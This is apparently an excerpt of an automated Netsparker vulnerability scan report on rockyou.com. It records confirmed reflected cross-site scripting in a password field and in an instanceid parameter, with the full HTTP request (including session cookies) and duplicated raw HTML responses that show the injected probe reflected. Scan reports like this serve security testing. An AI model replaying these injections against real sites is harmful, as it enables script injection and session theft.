ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000CAC)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option ..
|
- /show_my_gallery2.php
/show_my_gallery2.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| instanceid | GET | '+alert(9)+' |
Request
GET /show_my_gallery2.php?instanceid='%2Bnetsparker(9)%2B' HTTP/1.1
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=13193054
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164457; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=13193054
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164457; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:07:41 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:07:40 GMT; path=/; domain=.rockyou.com,lastlogin=1303164461; expires=Wed, 27-Jul-2011 22:07:41 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:07:41 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=261009 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9836
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="js/lightbox/prototype.js" type="text/javascript"></script><script src="js/lightbox/scriptaculous.js?load=effects" type="text/javascript"></script><script src="js/lightbox/lightbox.js" type="text/javascript"></script><script src="js/embeds.js?ver=5" type="text/javascript"></script><script src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js" type="text/javascript"></script><script src="js/subscription.js?ver=2" type="text/javascript"></script><script src="/js/standard.js" type="text/javascript"></script><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/comment.css" rel="stylesheet" type="text/css"><link href="/css/profile.css" rel="stylesheet" type="text/css"><link href="/css/lightbox.css" rel="stylesheet" type="text/css"><link href="/css/star_rating.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> <meta name="title" content="RockYou Slideshow" />
<meta name="description" content="Check out my new photos from RockYou.com." />
<link rel="image_src" href="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" />
<link rel="video_src" href="http://apps.rockyou.com/rockyou.swf?instanceid='+netsparker(9)+'"/>
<meta name="video_height" content="320" />
<meta name="video_width" content="426" />
<meta name="video_type" content="application/x-shockwave-flash" /></HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-button" style="font-weight:bold"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-create&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fchoose_widget.php">CREATE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-browse&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Ffeaturedartists.php">BROWSE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-mystuff&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fmy_stuff.php">MY STUFF</a></div> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Log In</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-register&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Register</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png");'> <img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<script type="text/javascript">
function thickBoxFrame(msg, url){
//alert(url);
url = url+'?KeepThis=true&TB_iframe=true&height=310&width=370';
TB_show('fff', 'http://www.google.com', '');
}
function getImgLink(img_src, img_cap) { var first_dot_index = img_src.indexOf('.') + 1; var rest_url = img_src.slice(first_dot_index,img_src.length); var second_dot_index = rest_url.indexOf('.'); var second_slice_index = rest_url.indexOf('/')+ first_dot_index ; var partner_name = rest_url.slice(0,second_dot_index); var partner_url = img_src; partner_url = img_src.slice(0,second_slice_index); //alert( '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\">rest_url</a>'); if (partner_name == 'badongo'){ img_src= img_src.replace('/ry/','/pic/').replace('.jpg',''); return '<a href=\"'+img_src+'\" target="_blank" title=\"'+img_cap+'\">view pic<br>('+partner_name+')</a>'; }else{ return '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\" onclick=\"ajax_post_john(\'/events/include/ajaxtrackevent.php\',\'name=rockyou-mobile&value=showmygallery\',null,null);\">view pic<br>('+partner_name+')</a>'; } }
function deleteComment(url) {
deleteme = confirm("Delete This Comment?");
if (deleteme) {
window.location=url;
}
}
function deletethis (e) {
if (!e) var e = window.event;
var tg = (e.target) ? e.target : e.srcElement
removeObj(tg.parentNode);
}
function removeObj(tr){
tr.parentNode.removeChild(tr);
}
function addtxtbox()
{
table=document.getElementById('tbltext');
mycurrent_row=document.createElement("TR");
mycurrent_cell=document.createElement("TD");
try
{
mycurrent_cell.innerHTML="<input type=\"text\" name=\"to[]\" class=\"textboxcl2\"> <input type=\"button\" value=\"Remove\" onclick=\"deletethis(event)\">";
}
catch(e)
{
mytextbox=document.createElement("INPUT");
mytextbox.setAttribute("type","text");
mytextbox.setAttribute("name","to[]");
mytextbox.setAttribute("class","textboxcl2");
mycurrent_cell.appendChild(mytextbox);
mybutton=document.createElement("INPUT");
mybutton.setAttribute("type","Button");
mybutton.setAttribute("value","Remove");
mybutton.setAttribute("onclick","alert('this')");
mycurrent_cell.appendChild(mybutton);
}
mycurrent_row.appendChild(mycurrent_cell);
table.getElementsByTagName('tbody')[0].appendChild(mycurrent_row);
}
function xmlhttpPostURL(type,data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url+"?instanceid=&#039;+netsparker(9)+&#039;", true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
//alert(self.xmlHttpReq.responseXML);
notXML = false;
if (self.xmlHttpReq.responseXML)
{
//eval ("var resp = "+self.xmlHttpReq.responseText);
xmlDoc = self.xmlHttpReq.responseXML.documentElement;
if (xmlDoc)
{
var thumbClass = (navigator.appVersion.indexOf('MSIE 6') == -1) ? 'smallthumb' : 'smallthumbIE6';
imageList = xmlDoc.getElementsByTagName("image");
capList = xmlDoc.getElementsByTagName("text");
imgs = "";
if (thumbnailStart > imageList.length) thumbnailStart -= calcThumbnailsCount();
if (thumbnailStart < 0) thumbnailStart = 0;
thumbnailEnd = thumbnailStart + calcThumbnailsCount();
if (thumbnailEnd > imageList.length) thumbnailEnd = imageList.length;
for (i = 0; i < imageList.length; i++)
{
img_src = imageList[i].getAttribute("path");
img_cap = URLDecode(capList[i].getAttribute("text"));
img_link = getImgLink(img_src, img_cap);
if ((i >= thumbnailStart) && (i < thumbnailEnd)) {
imgs += "<div class='thumbwrap'>";
} else {
imgs += "<div class='thumbwrap' style='display:none'>";
}
imgs += "<a href='"+img_src+"' rel='lightbox[show]'><img src='"+img_src+"' class='"+thumbClass+"' title=\""+img_cap+"\"></a><br><img src='/images/icons/mobilephone.gif' style='margin-top:8px;margin-left:7px;cursor:pointer;float:left' onclick=\"ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-mobile&value=showmygallery',null,null); window.open('http://photofun.funmo.com/rockyou/photos/new?orig_url="+escape(img_src)+"','tomobile','width=776,height=585,status=no,toolbar=no,menubar=no,scrollbars=no,resizable=yes,location=no,directories=no,status=no');return false;\">";
imgs += img_link+"</div>";
}
document.getElementById("photothumbs").innerHTML = imgs;
initLightbox();
actionJump();
}
else
{
notXML = true;
}
}
else
{
notXML = true;
}
if (notXML)
{
eval ("var resp = "+self.xmlHttpReq.responseText);
if (resp['mode']=='vote')
{
//set new Rating and Votes
document.getElementById('current-rating').style.width=30*resp['data'][0];
document.getElementById('current-vote').innerHTML=resp['data'][1]+' Votes';
}
}
}
}
self.xmlHttpReq.send(type+"="+escape(data));
}
function URLDecode(psEncodeString)
{
var lsRegExp = /\+/g;
return unescape(String(psEncodeString).replace(lsRegExp, " "));
}
function setStartSlide(slide)
{
document.getElementById('flashsrc').innerHTML='<embed src="http://apps.rockyou.com/rockyou.swf?instanceid=&#039;+netsparker(9)+&#039;&startSlide='+slide+'" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>';
}
function initPage()
{
xmlhttpPostURL("1",'',"xmlproxy.php");
}
if (window.addEventListener) {
window.addEventListener('load',initPage,false);
}
else window.attachEvent('onload',initPage);
function actionJump()
{
}
function rate_vote(vote)
{
xmlhttpPostURL("vote",vote,"show_my_gallery-ajax.php");
//alert(vote);
}
function rate_display(vote)
{
var note = "";
switch (vote)
{
case 1:
note = "Total Junk";
break;
case 2:
note = "Kinda Lame";
break;
case 3:
note = "Its OK";
break;
case 4:
note = "Pretty Good";
break;
case 5:
note = "Way Hot";
break;
}
document.getElementById('ratingtitle').innerHTML=note;
}
function rate_displayout()
{
document.getElementById('ratingtitle').innerHTML = "Rate Me!";
}
</script>
<div id="container" style='width:1125px;margin:auto;padding-top:15px'>
<div style="float:left;width:800px">
<table id="photothumbscontainer" style="margin-bottom:15px;" cellpadding="0" cellspacing="0" ><tr>
<td><img src="/images/thumbnailsLeft.gif" onclick="thumbnailStart-=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
<td id="photothumbs" style="width:800px; height:94px; background:#300018; padding: 2px 0; font-size:10px; vertical-align:bottom"> </td>
<td><img src="/images/thumbnailsRight.gif" onclick="thumbnailStart+=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
</tr></table>
<div id="contentwrapper" style="float:left" >
<div id="contentcolumn" style="width:500px" align="center">
<div align="left" style="width:500px">
<div style="width:425px;margin:0 auto;border:2px solid red;background:red;text-align:center;color:white">PRIVATE SLIDESHOW</div> <div id="slideshow-container" style="width:450px; height:300px; margin:0px auto 20px; border: 1px solid #a80050">
<div id='flashsrc'>
<table cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
<td><div id="embeddiv"></div></td>
<td>
<div style="width:100px;height:100px;position:absolute;">
<!--script type="text/javascript">var likeParams = ['01078cba91618ea1','drawerbutton'];</script><script type="text/javascript" src="http://partner.like.com/likesense/rockyou.js"></script-->
</div>
</td>
</tr>
</table>
</div>
</div>
<style>
#photothumbs a:link {color:#ffffff;}
</style>
<table style="margin: 0 auto; clear:both" width="450px"><tr>
<script>
function showPagelet(p) {
document.getElementById('sharePagelet').style.display='none';
document.getElementById('ratePagelet').style.display='none';
document.getElementById(p).style.display='';
}
</script>
<td><a href="#" onclick="ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-share&value=showmygallery',null,null); showPagelet('sharePagelet'); return false;">SHARE</a></td>
<td><a href="#" onclick="showPagelet('ratePagelet'); return false;">RATE</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-makeaslideshow&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fviewpage_clickthrough.php%3Fwidget%3Dslideshow%26instanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">MAKE A SLIDESHOW</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-addtofavorites&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Faddfavorite.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">ADD TO FAVORITES</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-report&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fsetinappropriate.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">REPORT</a></td>
</tr></table>
<div id="ajaxarea" style="width:450px; height:100px; background: #f51768; margin: 10px auto" >
<div id="sharePagelet" style="padding: 10..
Date: Mon, 18 Apr 2011 22:07:41 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:07:40 GMT; path=/; domain=.rockyou.com,lastlogin=1303164461; expires=Wed, 27-Jul-2011 22:07:41 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:07:41 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=261009 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9836
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="js/lightbox/prototype.js" type="text/javascript"></script><script src="js/lightbox/scriptaculous.js?load=effects" type="text/javascript"></script><script src="js/lightbox/lightbox.js" type="text/javascript"></script><script src="js/embeds.js?ver=5" type="text/javascript"></script><script src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js" type="text/javascript"></script><script src="js/subscription.js?ver=2" type="text/javascript"></script><script src="/js/standard.js" type="text/javascript"></script><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/comment.css" rel="stylesheet" type="text/css"><link href="/css/profile.css" rel="stylesheet" type="text/css"><link href="/css/lightbox.css" rel="stylesheet" type="text/css"><link href="/css/star_rating.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> <meta name="title" content="RockYou Slideshow" />
<meta name="description" content="Check out my new photos from RockYou.com." />
<link rel="image_src" href="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" />
<link rel="video_src" href="http://apps.rockyou.com/rockyou.swf?instanceid='+netsparker(9)+'"/>
<meta name="video_height" content="320" />
<meta name="video_width" content="426" />
<meta name="video_type" content="application/x-shockwave-flash" /></HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-button" style="font-weight:bold"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-create&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fchoose_widget.php">CREATE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-browse&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Ffeaturedartists.php">BROWSE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-mystuff&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fmy_stuff.php">MY STUFF</a></div> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Log In</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-register&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Register</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png");'> <img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<script type="text/javascript">
function thickBoxFrame(msg, url){
//alert(url);
url = url+'?KeepThis=true&TB_iframe=true&height=310&width=370';
TB_show('fff', 'http://www.google.com', '');
}
function getImgLink(img_src, img_cap) { var first_dot_index = img_src.indexOf('.') + 1; var rest_url = img_src.slice(first_dot_index,img_src.length); var second_dot_index = rest_url.indexOf('.'); var second_slice_index = rest_url.indexOf('/')+ first_dot_index ; var partner_name = rest_url.slice(0,second_dot_index); var partner_url = img_src; partner_url = img_src.slice(0,second_slice_index); //alert( '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\">rest_url</a>'); if (partner_name == 'badongo'){ img_src= img_src.replace('/ry/','/pic/').replace('.jpg',''); return '<a href=\"'+img_src+'\" target="_blank" title=\"'+img_cap+'\">view pic<br>('+partner_name+')</a>'; }else{ return '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\" onclick=\"ajax_post_john(\'/events/include/ajaxtrackevent.php\',\'name=rockyou-mobile&value=showmygallery\',null,null);\">view pic<br>('+partner_name+')</a>'; } }
function deleteComment(url) {
deleteme = confirm("Delete This Comment?");
if (deleteme) {
window.location=url;
}
}
function deletethis (e) {
if (!e) var e = window.event;
var tg = (e.target) ? e.target : e.srcElement
removeObj(tg.parentNode);
}
function removeObj(tr){
tr.parentNode.removeChild(tr);
}
function addtxtbox()
{
table=document.getElementById('tbltext');
mycurrent_row=document.createElement("TR");
mycurrent_cell=document.createElement("TD");
try
{
mycurrent_cell.innerHTML="<input type=\"text\" name=\"to[]\" class=\"textboxcl2\"> <input type=\"button\" value=\"Remove\" onclick=\"deletethis(event)\">";
}
catch(e)
{
mytextbox=document.createElement("INPUT");
mytextbox.setAttribute("type","text");
mytextbox.setAttribute("name","to[]");
mytextbox.setAttribute("class","textboxcl2");
mycurrent_cell.appendChild(mytextbox);
mybutton=document.createElement("INPUT");
mybutton.setAttribute("type","Button");
mybutton.setAttribute("value","Remove");
mybutton.setAttribute("onclick","alert('this')");
mycurrent_cell.appendChild(mybutton);
}
mycurrent_row.appendChild(mycurrent_cell);
table.getElementsByTagName('tbody')[0].appendChild(mycurrent_row);
}
function xmlhttpPostURL(type,data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url+"?instanceid=&#039;+netsparker(9)+&#039;", true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
//alert(self.xmlHttpReq.responseXML);
notXML = false;
if (self.xmlHttpReq.responseXML)
{
//eval ("var resp = "+self.xmlHttpReq.responseText);
xmlDoc = self.xmlHttpReq.responseXML.documentElement;
if (xmlDoc)
{
var thumbClass = (navigator.appVersion.indexOf('MSIE 6') == -1) ? 'smallthumb' : 'smallthumbIE6';
imageList = xmlDoc.getElementsByTagName("image");
capList = xmlDoc.getElementsByTagName("text");
imgs = "";
if (thumbnailStart > imageList.length) thumbnailStart -= calcThumbnailsCount();
if (thumbnailStart < 0) thumbnailStart = 0;
thumbnailEnd = thumbnailStart + calcThumbnailsCount();
if (thumbnailEnd > imageList.length) thumbnailEnd = imageList.length;
for (i = 0; i < imageList.length; i++)
{
img_src = imageList[i].getAttribute("path");
img_cap = URLDecode(capList[i].getAttribute("text"));
img_link = getImgLink(img_src, img_cap);
if ((i >= thumbnailStart) && (i < thumbnailEnd)) {
imgs += "<div class='thumbwrap'>";
} else {
imgs += "<div class='thumbwrap' style='display:none'>";
}
imgs += "<a href='"+img_src+"' rel='lightbox[show]'><img src='"+img_src+"' class='"+thumbClass+"' title=\""+img_cap+"\"></a><br><img src='/images/icons/mobilephone.gif' style='margin-top:8px;margin-left:7px;cursor:pointer;float:left' onclick=\"ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-mobile&value=showmygallery',null,null); window.open('http://photofun.funmo.com/rockyou/photos/new?orig_url="+escape(img_src)+"','tomobile','width=776,height=585,status=no,toolbar=no,menubar=no,scrollbars=no,resizable=yes,location=no,directories=no,status=no');return false;\">";
imgs += img_link+"</div>";
}
document.getElementById("photothumbs").innerHTML = imgs;
initLightbox();
actionJump();
}
else
{
notXML = true;
}
}
else
{
notXML = true;
}
if (notXML)
{
eval ("var resp = "+self.xmlHttpReq.responseText);
if (resp['mode']=='vote')
{
//set new Rating and Votes
document.getElementById('current-rating').style.width=30*resp['data'][0];
document.getElementById('current-vote').innerHTML=resp['data'][1]+' Votes';
}
}
}
}
self.xmlHttpReq.send(type+"="+escape(data));
}
function URLDecode(psEncodeString)
{
var lsRegExp = /\+/g;
return unescape(String(psEncodeString).replace(lsRegExp, " "));
}
function setStartSlide(slide)
{
document.getElementById('flashsrc').innerHTML='<embed src="http://apps.rockyou.com/rockyou.swf?instanceid=&#039;+netsparker(9)+&#039;&startSlide='+slide+'" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>';
}
function initPage()
{
xmlhttpPostURL("1",'',"xmlproxy.php");
}
if (window.addEventListener) {
window.addEventListener('load',initPage,false);
}
else window.attachEvent('onload',initPage);
function actionJump()
{
}
function rate_vote(vote)
{
xmlhttpPostURL("vote",vote,"show_my_gallery-ajax.php");
//alert(vote);
}
function rate_display(vote)
{
var note = "";
switch (vote)
{
case 1:
note = "Total Junk";
break;
case 2:
note = "Kinda Lame";
break;
case 3:
note = "Its OK";
break;
case 4:
note = "Pretty Good";
break;
case 5:
note = "Way Hot";
break;
}
document.getElementById('ratingtitle').innerHTML=note;
}
function rate_displayout()
{
document.getElementById('ratingtitle').innerHTML = "Rate Me!";
}
</script>
<div id="container" style='width:1125px;margin:auto;padding-top:15px'>
<div style="float:left;width:800px">
<table id="photothumbscontainer" style="margin-bottom:15px;" cellpadding="0" cellspacing="0" ><tr>
<td><img src="/images/thumbnailsLeft.gif" onclick="thumbnailStart-=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
<td id="photothumbs" style="width:800px; height:94px; background:#300018; padding: 2px 0; font-size:10px; vertical-align:bottom"> </td>
<td><img src="/images/thumbnailsRight.gif" onclick="thumbnailStart+=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
</tr></table>
<div id="contentwrapper" style="float:left" >
<div id="contentcolumn" style="width:500px" align="center">
<div align="left" style="width:500px">
<div style="width:425px;margin:0 auto;border:2px solid red;background:red;text-align:center;color:white">PRIVATE SLIDESHOW</div> <div id="slideshow-container" style="width:450px; height:300px; margin:0px auto 20px; border: 1px solid #a80050">
<div id='flashsrc'>
<table cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
<td><div id="embeddiv"></div></td>
<td>
<div style="width:100px;height:100px;position:absolute;">
